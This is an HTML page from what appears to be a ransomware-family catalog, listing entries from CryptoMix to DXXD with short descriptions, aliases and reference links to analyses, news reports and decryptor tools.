<h3 id="_cryptomix"><a class="anchor" href="#_cryptomix"></a><a class="link" href="#_cryptomix">CryptoMix</a></h3>
<div class="paragraph">
<p>Ransomware</p>
</div>
<div class="paragraph">
<p>CryptoMix is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Zeta</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1947. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.nyxbone.com/malware/CryptoMix.html">http://www.nyxbone.com/malware/CryptoMix.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.cert.pl/en/news/single/technical-analysis-of-cryptomixcryptfile2-ransomware/">https://www.cert.pl/en/news/single/technical-analysis-of-cryptomixcryptfile2-ransomware/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/JakubKroustek/status/804009831518572544">https://twitter.com/JakubKroustek/status/804009831518572544</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.bleepingcomputer.com/news/security/new-empty-cryptomix-ransomware-variant-released/">https://www.bleepingcomputer.com/news/security/new-empty-cryptomix-ransomware-variant-released/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.bleepingcomputer.com/news/security/0000-cryptomix-ransomware-variant-released/">https://www.bleepingcomputer.com/news/security/0000-cryptomix-ransomware-variant-released/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.bleepingcomputer.com/news/security/xzzx-cryptomix-ransomware-variant-released/">https://www.bleepingcomputer.com/news/security/xzzx-cryptomix-ransomware-variant-released/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.bleepingcomputer.com/news/security/test-cryptomix-ransomware-variant-released/">https://www.bleepingcomputer.com/news/security/test-cryptomix-ransomware-variant-released/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.bleepingcomputer.com/news/security/work-cryptomix-ransomware-variant-released/">https://www.bleepingcomputer.com/news/security/work-cryptomix-ransomware-variant-released/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.bleepingcomputer.com/news/security/system-cryptomix-ransomware-variant-released/">https://www.bleepingcomputer.com/news/security/system-cryptomix-ransomware-variant-released/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.bleepingcomputer.com/news/security/mole66-cryptomix-ransomware-variant-released/">https://www.bleepingcomputer.com/news/security/mole66-cryptomix-ransomware-variant-released/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_cryptoransomeware"><a class="anchor" href="#_cryptoransomeware"></a><a class="link" href="#_cryptoransomeware">CryptoRansomeware</a></h3>
<div class="paragraph">
<p>Ransomware</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1948. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/malwrhunterteam/status/817672617658347521">https://twitter.com/malwrhunterteam/status/817672617658347521</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_cryptoroger"><a class="anchor" href="#_cryptoroger"></a><a class="link" href="#_cryptoroger">CryptoRoger</a></h3>
<div class="paragraph">
<p>Ransomware</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1949. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.bleepingcomputer.com/news/security/new-ransomware-called-cryptoroger-that-appends-crptrgr-to-encrypted-files/">http://www.bleepingcomputer.com/news/security/new-ransomware-called-cryptoroger-that-appends-crptrgr-to-encrypted-files/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_cryptoshadow"><a class="anchor" href="#_cryptoshadow"></a><a class="link" href="#_cryptoshadow">CryptoShadow</a></h3>
<div class="paragraph">
<p>Ransomware</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1950. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/struppigel/status/821992610164277248">https://twitter.com/struppigel/status/821992610164277248</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_cryptoshocker"><a class="anchor" href="#_cryptoshocker"></a><a class="link" href="#_cryptoshocker">CryptoShocker</a></h3>
<div class="paragraph">
<p>Ransomware</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1951. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.bleepingcomputer.com/forums/t/617601/cryptoshocker-ransomware-help-and-support-topic-locked-attentionurl/">http://www.bleepingcomputer.com/forums/t/617601/cryptoshocker-ransomware-help-and-support-topic-locked-attentionurl/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_cryptotorlocker2015"><a class="anchor" href="#_cryptotorlocker2015"></a><a class="link" href="#_cryptotorlocker2015">CryptoTorLocker2015</a></h3>
<div class="paragraph">
<p>Ransomware</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1952. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.bleepingcomputer.com/forums/t/565020/new-cryptotorlocker2015-ransomware-discovered-and-easily-decrypted/">http://www.bleepingcomputer.com/forums/t/565020/new-cryptotorlocker2015-ransomware-discovered-and-easily-decrypted/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_cryptotrooper"><a class="anchor" href="#_cryptotrooper"></a><a class="link" href="#_cryptotrooper">CryptoTrooper</a></h3>
<div class="paragraph">
<p>Ransomware</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1953. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://news.softpedia.com/news/new-open-source-linux-ransomware-shows-infosec-community-divide-508669.shtml">http://news.softpedia.com/news/new-open-source-linux-ransomware-shows-infosec-community-divide-508669.shtml</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_cryptowall_1"><a class="anchor" href="#_cryptowall_1"></a><a class="link" href="#_cryptowall_1">CryptoWall 1</a></h3>
<div class="paragraph">
<p>Ransomware</p>
</div>
</div>
<div class="sect2">
<h3 id="_cryptowall_2"><a class="anchor" href="#_cryptowall_2"></a><a class="link" href="#_cryptowall_2">CryptoWall 2</a></h3>
<div class="paragraph">
<p>Ransomware</p>
</div>
</div>
<div class="sect2">
<h3 id="_cryptowall_3"><a class="anchor" href="#_cryptowall_3"></a><a class="link" href="#_cryptowall_3">CryptoWall 3</a></h3>
<div class="paragraph">
<p>Ransomware</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1954. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blogs.technet.microsoft.com/mmpc/2015/01/13/crowti-update-cryptowall-3-0/">https://blogs.technet.microsoft.com/mmpc/2015/01/13/crowti-update-cryptowall-3-0/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.virustotal.com/en/file/45317968759d3e37282ceb75149f627d648534c5b4685f6da3966d8f6fca662d/analysis/">https://www.virustotal.com/en/file/45317968759d3e37282ceb75149f627d648534c5b4685f6da3966d8f6fca662d/analysis/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_cryptowall_4"><a class="anchor" href="#_cryptowall_4"></a><a class="link" href="#_cryptowall_4">CryptoWall 4</a></h3>
<div class="paragraph">
<p>Ransomware</p>
</div>
</div>
<div class="sect2">
<h3 id="_cryptxxx"><a class="anchor" href="#_cryptxxx"></a><a class="link" href="#_cryptxxx">CryptXXX</a></h3>
<div class="paragraph">
<p>Ransomware Comes with Bedep</p>
</div>
<div class="paragraph">
<p>CryptXXX is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>CryptProjectXXX</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1955. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://support.kaspersky.com/viruses/disinfection/8547">https://support.kaspersky.com/viruses/disinfection/8547</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.bleepingcomputer.com/virus-removal/cryptxxx-ransomware-help-information">http://www.bleepingcomputer.com/virus-removal/cryptxxx-ransomware-help-information</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_cryptxxx_2_0"><a class="anchor" href="#_cryptxxx_2_0"></a><a class="link" href="#_cryptxxx_2_0">CryptXXX 2.0</a></h3>
<div class="paragraph">
<p>Ransomware Locks screen. Ransom note names are an ID. Comes with Bedep.</p>
</div>
<div class="paragraph">
<p>CryptXXX 2.0 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>CryptProjectXXX</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1956. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://support.kaspersky.com/viruses/disinfection/8547">https://support.kaspersky.com/viruses/disinfection/8547</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.proofpoint.com/us/threat-insight/post/cryptxxx2-ransomware-authors-strike-back-against-free-decryption-tool">https://www.proofpoint.com/us/threat-insight/post/cryptxxx2-ransomware-authors-strike-back-against-free-decryption-tool</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://blogs.cisco.com/security/cryptxxx-technical-deep-dive">http://blogs.cisco.com/security/cryptxxx-technical-deep-dive</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_cryptxxx_3_0"><a class="anchor" href="#_cryptxxx_3_0"></a><a class="link" href="#_cryptxxx_3_0">CryptXXX 3.0</a></h3>
<div class="paragraph">
<p>Ransomware Comes with Bedep</p>
</div>
<div class="paragraph">
<p>CryptXXX 3.0 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>UltraDeCrypter</p>
</li>
<li>
<p>UltraCrypter</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1957. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://support.kaspersky.com/viruses/disinfection/8547">https://support.kaspersky.com/viruses/disinfection/8547</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.bleepingcomputer.com/news/security/cryptxxx-updated-to-version-3-0-decryptors-no-longer-work/">http://www.bleepingcomputer.com/news/security/cryptxxx-updated-to-version-3-0-decryptors-no-longer-work/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://blogs.cisco.com/security/cryptxxx-technical-deep-dive">http://blogs.cisco.com/security/cryptxxx-technical-deep-dive</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_cryptxxx_3_1"><a class="anchor" href="#_cryptxxx_3_1"></a><a class="link" href="#_cryptxxx_3_1">CryptXXX 3.1</a></h3>
<div class="paragraph">
<p>Ransomware StilerX credential stealing</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1958. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://support.kaspersky.com/viruses/disinfection/8547">https://support.kaspersky.com/viruses/disinfection/8547</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.proofpoint.com/us/threat-insight/post/cryptxxx-ransomware-learns-samba-other-new-tricks-with-version3100">https://www.proofpoint.com/us/threat-insight/post/cryptxxx-ransomware-learns-samba-other-new-tricks-with-version3100</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_crypy"><a class="anchor" href="#_crypy"></a><a class="link" href="#_crypy">CryPy</a></h3>
<div class="paragraph">
<p>Ransomware</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1959. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.bleepingcomputer.com/news/security/ctb-faker-ransomware-does-a-poor-job-imitating-ctb-locker/">http://www.bleepingcomputer.com/news/security/ctb-faker-ransomware-does-a-poor-job-imitating-ctb-locker/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_ctb_faker"><a class="anchor" href="#_ctb_faker"></a><a class="link" href="#_ctb_faker">CTB-Faker</a></h3>
<div class="paragraph">
<p>Ransomware</p>
</div>
<div class="paragraph">
<p>CTB-Faker is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Citroni</p>
</li>
</ul>
</div>
</div>
<div class="sect2">
<h3 id="_ctb_locker_web"><a class="anchor" href="#_ctb_locker_web"></a><a class="link" href="#_ctb_locker_web">CTB-Locker WEB</a></h3>
<div class="paragraph">
<p>Ransomware websites only</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1960. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://thisissecurity.net/2016/02/26/a-lockpicking-exercise/">https://thisissecurity.net/2016/02/26/a-lockpicking-exercise/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://github.com/eyecatchup/Critroni-php">https://github.com/eyecatchup/Critroni-php</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_cuteransomware"><a class="anchor" href="#_cuteransomware"></a><a class="link" href="#_cuteransomware">CuteRansomware</a></h3>
<div class="paragraph">
<p>Ransomware Based on my-Little-Ransomware</p>
</div>
<div class="paragraph">
<p>CuteRansomware is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>my-Little-Ransomware</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1961. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://github.com/aaaddress1/my-Little-Ransomware/tree/master/decryptoTool">https://github.com/aaaddress1/my-Little-Ransomware/tree/master/decryptoTool</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://github.com/aaaddress1/my-Little-Ransomware">https://github.com/aaaddress1/my-Little-Ransomware</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_cyber_splitter_vbs"><a class="anchor" href="#_cyber_splitter_vbs"></a><a class="link" href="#_cyber_splitter_vbs">Cyber SpLiTTer Vbs</a></h3>
<div class="paragraph">
<p>Ransomware Based on HiddenTear</p>
</div>
<div class="paragraph">
<p>Cyber SpLiTTer Vbs is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>CyberSplitter</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1962. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/struppigel/status/778871886616862720">https://twitter.com/struppigel/status/778871886616862720</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/struppigel/status/806758133720698881">https://twitter.com/struppigel/status/806758133720698881</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_death_bitches"><a class="anchor" href="#_death_bitches"></a><a class="link" href="#_death_bitches">Death Bitches</a></h3>
<div class="paragraph">
<p>Ransomware</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1963. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/JaromirHorejsi/status/815555258478981121">https://twitter.com/JaromirHorejsi/status/815555258478981121</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_decrypt_protect"><a class="anchor" href="#_decrypt_protect"></a><a class="link" href="#_decrypt_protect">DeCrypt Protect</a></h3>
<div class="paragraph">
<p>Ransomware</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1964. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.malwareremovalguides.info/decrypt-files-with-decrypt_mblblock-exe-decrypt-protect/">http://www.malwareremovalguides.info/decrypt-files-with-decrypt_mblblock-exe-decrypt-protect/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_dedcryptor"><a class="anchor" href="#_dedcryptor"></a><a class="link" href="#_dedcryptor">DEDCryptor</a></h3>
<div class="paragraph">
<p>Ransomware Based on EDA2</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1965. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.bleepingcomputer.com/forums/t/617395/dedcryptor-ded-help-support-topic/">http://www.bleepingcomputer.com/forums/t/617395/dedcryptor-ded-help-support-topic/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.nyxbone.com/malware/DEDCryptor.html">http://www.nyxbone.com/malware/DEDCryptor.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_demo"><a class="anchor" href="#_demo"></a><a class="link" href="#_demo">Demo</a></h3>
<div class="paragraph">
<p>Ransomware only encrypts .jpg files</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1966. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/struppigel/status/798573300779745281">https://twitter.com/struppigel/status/798573300779745281</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_detoxcrypto"><a class="anchor" href="#_detoxcrypto"></a><a class="link" href="#_detoxcrypto">DetoxCrypto</a></h3>
<div class="paragraph">
<p>Ransomware - Based on Detox: Calipso, We are all Pokemons, Nullbyte</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1967. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.bleepingcomputer.com/news/security/new-detoxcrypto-ransomware-pretends-to-be-pokemongo-or-uploads-a-picture-of-your-screen/">http://www.bleepingcomputer.com/news/security/new-detoxcrypto-ransomware-pretends-to-be-pokemongo-or-uploads-a-picture-of-your-screen/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_digisom"><a class="anchor" href="#_digisom"></a><a class="link" href="#_digisom">Digisom</a></h3>
<div class="paragraph">
<p>Ransomware</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1968. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/PolarToffee/status/829727052316160000">https://twitter.com/PolarToffee/status/829727052316160000</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_dirtydecrypt"><a class="anchor" href="#_dirtydecrypt"></a><a class="link" href="#_dirtydecrypt">DirtyDecrypt</a></h3>
<div class="paragraph">
<p>Ransomware</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1969. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/demonslay335/status/752586334527709184">https://twitter.com/demonslay335/status/752586334527709184</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_dmalocker"><a class="anchor" href="#_dmalocker"></a><a class="link" href="#_dmalocker">DMALocker</a></h3>
<div class="paragraph">
<p>Ransomware no extension change Encrypted files have prefix: Version 1: ABCXYZ11 - Version 2: !DMALOCK - Version 3: !DMALOCK3.0 - Version 4: !DMALOCK4.0</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1970. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://decrypter.emsisoft.com/">https://decrypter.emsisoft.com/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://github.com/hasherezade/dma_unlocker">https://github.com/hasherezade/dma_unlocker</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://drive.google.com/drive/folders/0Bzb5kQFOXkiSMm94QzdyM3hCdDg">https://drive.google.com/drive/folders/0Bzb5kQFOXkiSMm94QzdyM3hCdDg</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blog.malwarebytes.org/threat-analysis/2016/02/dma-locker-a-new-ransomware-but-no-reason-to-panic/">https://blog.malwarebytes.org/threat-analysis/2016/02/dma-locker-a-new-ransomware-but-no-reason-to-panic/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_dmalocker_3_0"><a class="anchor" href="#_dmalocker_3_0"></a><a class="link" href="#_dmalocker_3_0">DMALocker 3.0</a></h3>
<div class="paragraph">
<p>Ransomware</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1971. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://drive.google.com/drive/folders/0Bzb5kQFOXkiSMm94QzdyM3hCdDg">https://drive.google.com/drive/folders/0Bzb5kQFOXkiSMm94QzdyM3hCdDg</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blog.malwarebytes.org/threat-analysis/2016/02/dma-locker-strikes-back/">https://blog.malwarebytes.org/threat-analysis/2016/02/dma-locker-strikes-back/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_dnransomware"><a class="anchor" href="#_dnransomware"></a><a class="link" href="#_dnransomware">DNRansomware</a></h3>
<div class="paragraph">
<p>Ransomware Code to decrypt: 83KYG9NW-3K39V-2T3HJ-93F3Q-GT</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1972. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/BleepinComputer/status/822500056511213568">https://twitter.com/BleepinComputer/status/822500056511213568</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_domino"><a class="anchor" href="#_domino"></a><a class="link" href="#_domino">Domino</a></h3>
<div class="paragraph">
<p>Ransomware Based on Hidden Tear</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1973. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.nyxbone.com/malware/Domino.html">http://www.nyxbone.com/malware/Domino.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.bleepingcomputer.com/news/security/the-curious-case-of-the-domino-ransomware-a-windows-crack-and-a-cow/">http://www.bleepingcomputer.com/news/security/the-curious-case-of-the-domino-ransomware-a-windows-crack-and-a-cow/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_donotchange"><a class="anchor" href="#_donotchange"></a><a class="link" href="#_donotchange">DoNotChange</a></h3>
<div class="paragraph">
<p>Ransomware</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1974. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.bleepingcomputer.com/forums/t/643330/donotchange-ransomware-id-7es642406cry-do-not-change-the-file-namecryp/">https://www.bleepingcomputer.com/forums/t/643330/donotchange-ransomware-id-7es642406cry-do-not-change-the-file-namecryp/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_dummylocker"><a class="anchor" href="#_dummylocker"></a><a class="link" href="#_dummylocker">DummyLocker</a></h3>
<div class="paragraph">
<p>Ransomware</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1975. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/struppigel/status/794108322932785158">https://twitter.com/struppigel/status/794108322932785158</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_dxxd"><a class="anchor" href="#_dxxd"></a><a class="link" href="#_dxxd">DXXD</a></h3>
<div class="paragraph">
<p>Ransomware</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1976. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.bleepingcomputer.com/forums/t/627831/dxxd-ransomware-dxxd-help-support-readmetxt/">https://www.bleepingcomputer.com/forums/t/627831/dxxd-ransomware-dxxd-help-support-readmetxt/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.bleepingcomputer.com/news/security/the-dxxd-ransomware-displays-legal-notice-before-users-login/">https://www.bleepingcomputer.com/news/security/the-dxxd-ransomware-displays-legal-notice-before-users-login/</a></p></td>
</tr>
</tbody>
